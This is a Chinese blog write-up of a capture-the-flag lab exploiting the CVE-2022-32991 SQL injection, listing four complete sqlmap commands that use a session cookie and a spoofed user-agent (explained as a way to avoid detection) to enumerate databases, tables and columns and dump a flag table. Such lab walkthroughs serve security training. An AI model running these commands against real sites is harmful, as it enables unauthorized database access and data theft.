首页 > 数据库 >SQL注入攻击 CVE-2022-32991

SQL注入攻击 CVE-2022-32991

时间:2023-05-10 16:55:35浏览次数:39  
标签:sqlmap 32991 -- agent cookie eid 2022 SQL 47.0

春秋云镜靶场

 注册并登录:

 三个按钮随便选一个都有eid参数,抓包获取到useragent和cookie。

 使用sqlmap进行爆库:

python3 sqlmap.py -u "http://eci-2ze9ucov849lkjtij17c.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0" --cookie="PHPSESSID=lfggbk2ocgjghdc1815hqasp91" --batch --dbs

  其中-p "eid"指定漏洞爆破参数为eid,--user-agent指定UA,避免SQLmap被识别到,--cookie指定cookie,指定用户身份,绕过身份认证。

 对ctf库进行爆表:

python3 sqlmap.py -u "http://eci-2ze9ucov849lkjtij17c.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0" --cookie="PHPSESSID=lfggbk2ocgjghdc1815hqasp91" --batch -D "ctf" --tables 

 爆破flag表的字段:

python3 sqlmap.py -u "http://eci-2ze9ucov849lkjtij17c.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0" --cookie="PHPSESSID=lfggbk2ocgjghdc1815hqasp91" --batch -D "ctf" -T "flag" --columns

 爆破flag表的数据:

python3 sqlmap.py -u "http://eci-2ze9ucov849lkjtij17c.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0" --cookie="PHPSESSID=lfggbk2ocgjghdc1815hqasp91" --batch -D "ctf" -T "flag" --dump

 

标签:sqlmap,32991,--,agent,cookie,eid,2022,SQL,47.0
From: https://www.cnblogs.com/a-deng/p/17388479.html

相关文章

  • .Net Core 3. VS2022 + Core6.0 + Razor Razor 页面
    列表页Pages/Movies/Index.cshtml.csRazor页面派生自 PageModel。按照约定,PageModel 派生的类称为 PageNameModel。例如,“索引”页命名为 IndexModel。这里使用IndexModel的构造函数,通过依赖注入的方式,将数据上下文对象StandardCoreStudyContext添加到页面中。......
  • 用sql语句实现sqlserver不同库间表相互同步
    同步表的方式有很多种因为不想太过于麻烦所以就用存储过程来实现某些表同步createproccopytbaleas--表名declare@namenvarchar(50)--创建表declare@createtablenvarchar(200)--删除表declare@deletetablenvarchar(200)--定义游标declaretabnameCURSORF......
  • 2022年考研数据结构_3 栈和队列
    文章目录3.栈和队列3.1栈3.1.1栈的定义3.1.2栈的实现3.1.3栈的应用(1)递归(2)四则运算表达式求解①中缀表达式转后缀表达式②后缀表达式的计算3.2队列3.2.1队列的定义3.2.2队列的实现3.2.2队列的应用3.3应用3.3.1表达式语言表示1--中缀转后缀语言表述2--中缀转后缀优......
  • sql优化随笔1
    MySQL性能最大数据量最大并发数查询耗时0.5秒实施原则数据表设计数据类型避免空值text类型索引优化索引分类优化原则SQL优化分批处理不做列运算避免Select*操作符<>优化OR优化IN优化LIKE优化JOIN优化LIMIT优化其他数据库  博主负责的项目主要采用阿里云数据库MySQL,最近频繁出现......
  • 【完结撒花】MySQL(二十三)主从复制
    MySQL(二十三)主从复制1主从复制概述1.1如何提高数据库并发能力在实际工作中,常将Redis和MySQL配合使用,如果有请求的时候,首先在缓存中查找,如果存在就直接取出,不存在再访问数据库,这样就提升了读取的效率,减少了对后端数据库的访问压力,Redis缓存是高并发架构非常重要的一环......
  • mysql中删除时报错Cannot truncate a table referenced in a foreign key constraint
    在Mysql使用Truncate截断表时,提示Cannottruncateatablereferencedinaforeignkeyconstraint(monitoritem,CONSTRAINTmonitortaskpollutant_monitortask_fk)。这是因为存在外键约束导致的无法删除,我们可以先关闭外键约束,删除后再启动外键约束。1、检查外键约束SELE......
  • Postgresql insert on conflict笔记
    描述针对数据写入时有主键冲突的情况,INSERTONCONFLICT语法可以将冲突主键的INSERT行为转换为UPDATE行为,从而实现冲突主键的覆盖写入。该特性又称UPSERT覆盖写,与MySQL的REPLACEINTO类似。[WITH[RECURSIVE]with_query[,...]]INSERTINTOtable_name[ASalias][......
  • SQLSERVER获取汉字拼音码
     用户的输入经常用到拼音码选择器 --调用方法select dbo.wsh_GetPY('汉字')ALTERFUNCTION[dbo].[wsh_GetPY](@strNVARCHAR(4000))RETURNSNVARCHAR(4000)ASBEGINDECLARE@WORDNCHAR(1),@PYNVARCHAR(4000)SET@PY=''WHILELEN(@STR)>0BEGI......
  • mysql创建systemd管理项
    vim/usr/lib/systemd/system/mysqld.service写入system配置:[Unit]Description=MySQLServerDocumentation=mysqld##mysql参考手册Documentation=http://dev.mysql.com/doc/refman/en/using-systemd.htmlAfter=network.targetAfter=syslog.target[Install]WantedBy=mul......
  • sql必知必会笔记
    sql关键字作为保留字使用,不能用于表或者列的名称sql语句不区分大小写sql语句中空格会被忽略select列名之间用逗号分隔少用*号检索,会降低性能distinct关键字作用于所有的列限制结果语法top5关键字sqlserver和access中使用fetchfirst5rowsonlyDB2......